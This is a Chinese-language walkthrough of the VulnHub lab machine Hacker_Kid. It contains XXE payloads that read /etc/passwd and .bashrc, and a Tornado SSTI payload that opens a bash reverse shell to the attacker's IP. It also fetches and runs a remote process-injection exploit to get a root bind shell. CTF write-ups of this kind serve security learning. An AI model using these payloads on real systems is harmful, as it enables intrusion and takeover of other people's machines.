vulnhub之Hacker_Kid-v1.0.1
kali:192.168.181.129
靶机:192.168.181.154
信息收集
首先进行ip扫描
打开网页进行查看
查看开启哪些端口
nmap -sC -sV 192.168.181.154 --min-rate=2000 -v -p-
我们可以看到有两个开启了http服务
于是我在80 端口查看源码,他给我们一个提示
说是通过有一个 GET 参数“page_no”,进行模糊测试,于是使用brupsuit进行尝试
webshell
发现数值大小,对网页有不同影响,于是打开网页进行查看
在最底下给了个提示 ,于是将这个域名加载到/etc/hosts下
对其他域名进行爆破,使用dig
dig hackers.blackhat.local @192.168.181.154
我们爆破了新的域名,于是将他添加到/etc/hosts
于是在kali的网页上进行访问
于是进行抓包分析
我发现他是一个xxe漏洞,有点像xxe实体注入
参考:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
我对其进行修改,我们要读取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
<name></name>
<tel></tel>
<email>&xxe;</email>
<password></password>
</root>
修改后,发现读取成功,但是好像/etc/passwd好像被替换了
我在打开.bashrc时,没有打开,但是在使用使用 PHP 包装器时,我们可以获得 base64 格式的内容
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root>
<name></name>
<tel></tel>
<email>&xxe;</email>
<password></password>
</root>
于是进行base64解码,在最后发现了用户名密码
上文还有一个9999端口也开启http服务,且运行Tornado,于是打开进行查看
没有成功,于是我使用saket进行登录,因为在上文中只有这个用户在/home下,密码不变
由于Tornado是一个Python web的技术,我怀疑GET一个参数‘name’,我们可以传入一个参数
于是我进行简单的SSTI负载
参考
https: //book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
说明命令可以执行,于是进行反弹
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.181.129/9001 0>&1"')}}
在kali进行监听9001端口
但是,没有成功,于是我进行url编码
%7B%25%20import%20os%20%25%7D%7B%7Bos.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.181.129%2F9001%200%3E%261%22%27)%7D%7D
权限提升:
于是使用getcap,他说admin在这个目录下
/sbin/getcap -r / 2>/dev/null
为此我们必须确定根进程
于是将ID914作为进程的 PID 作为参数。执行漏洞利用后,它会在端口 5600 处创建一个绑定 shell。因此,我们可以连接到绑定 shell 并获取 root shell
cd /tmp
wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py
python2.7 inject.py 914
ss -tnlp
于是在kali进行链接
于是获得root权限
vulnhub之Hacker_Kid-v1.0.1相关推荐
- Mission-Pumpkin v1.0: PumpkinGarden(南瓜花园)靶机的渗透测试
描述 Mission-Pumpkin v1.0是初学者级别的CTF系列.该CTF系列适用于对黑客工具和技术具有基本知识,但又难以应用已知工具的人们.南瓜花园是Mission-Pumpkin v1.0下 ...
- VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysy ...
- java 开源sns_JEESNS V1.0发布,JAVA 开源 SNS 社交系统
JEESNS V1.0 发布了,本次更新内容: 增加后台管理员授权与取消功能 增加私信模块 解决在微博页面,左侧微博点赞过后,左侧展示列表小手会变黑,但是右侧热门出小手依然是白色 修复后台添加栏目.文 ...
- Kubernetes v1.0特性解析
kubernetes1.0刚刚发布,开源社区400多位贡献者一年的努力,多达14000多次的代码提交,最终达到了之前预计的milestone, 并意味着这个开源容器编排系统可以正式在生产环境使用,必将 ...
- 企业智能化升级之路:CSDN《2017-2018中国人工智能产业路线图V1.0》重磅发布
2017年是AI之年,人工智能领域多年的努力和积累终于勃发,从政府到民间,从国家战略到坊间热点,从学术圈到资本圈,从主流领导企业到创新独角兽,一时间全社会各个角落关注AI.走向AI.布局AI,AI正在 ...
- 开发者AI职业指南:CSDN《AI技术人才成长路线图V1.0》重磅发布
人工智能浪潮来袭,开发者应该怎么办?2018年1月16日,在刚刚召开的"AI生态赋能2018论坛"上,CSDN副总裁孟岩重磅发布了AI技术职业升级指南--<AI 技术人才成长 ...
- 5万字的《Java面试手册》V1.0版本,高清PDF免费获取
利用空余时间整理了一份<Java面试手册>,初衷也很简单,就是希望在面试的时候能够帮助到大家,减轻大家的负担和节省时间. 前两天,朋友圈分享了这份这份面试手册的初稿,再几位同学的提议下,对 ...
- 《大厂算法面试题目与答案汇总,剑指offer等常考算法题思路,python代码》V1.0版...
为了进入大厂,我想很多人都会去牛客.知乎.CSDN等平台去查看面经,了解各个大厂在问技术问题的时候都会问些什么样的问题. 在看了几十上百篇面经之后,我将算法工程师的各种类型最常问到的问题都整理了出来, ...
- SQL防注入程序 v1.0
/// ***************C#版SQL防注入程序 v1.0************ /// *使用方法: /// 一.整站防注入(推荐) /// 在Global.asax.cs中查找App ...
- XCMS V1.0 Beta1 发布
XCMS V1.0 Beta1 发布 说明: XCMS是一个内容管理系统,是新生命开发团队利用业余时间开发的第一个成功项目! XCMS目前只有基本的文章发布.栏目管理.评论.用户管理和模板管理等功能. ...
最新文章
- ROCK 聚类算法
- Hibernate5-唯一查询和聚合查询
- python 鼠标键盘操作 pyautogui
- 生鲜电商回光返照? 不! 是起死回生!
- python穷举法搬砖_python 穷举法 算24点(史上最简短代码)-阿里云开发者社区
- 去除链接虚线边框css
- 【干货】求之不得的 Java 文档教程大汇总!
- boost::callable_traits添加member右值引用的测试程序
- OpenCV主成分分析(PCA)简介
- 【C语言简单说】十六:do...while循环
- 谓词::不适合Java
- font-family:微软雅黑; 与 font-family:Microsoft YaHei; 的区别?
- 视频点播-上传视频状态异常
- 51nod1005大数加法(C语言实现大数)
- js 调用 php,利用js调用后台php进行数据处理原码
- oci8 php,PHP_试用php中oci8扩展,给大家分享个php操作Oracle的操 - phpStudy
- React-leaflet在ant-design pro中的基本使用
- unity3d 资源网站(持续更新中。。。)
- Multisim 14元件伏安特性测量
- Janusgraph事务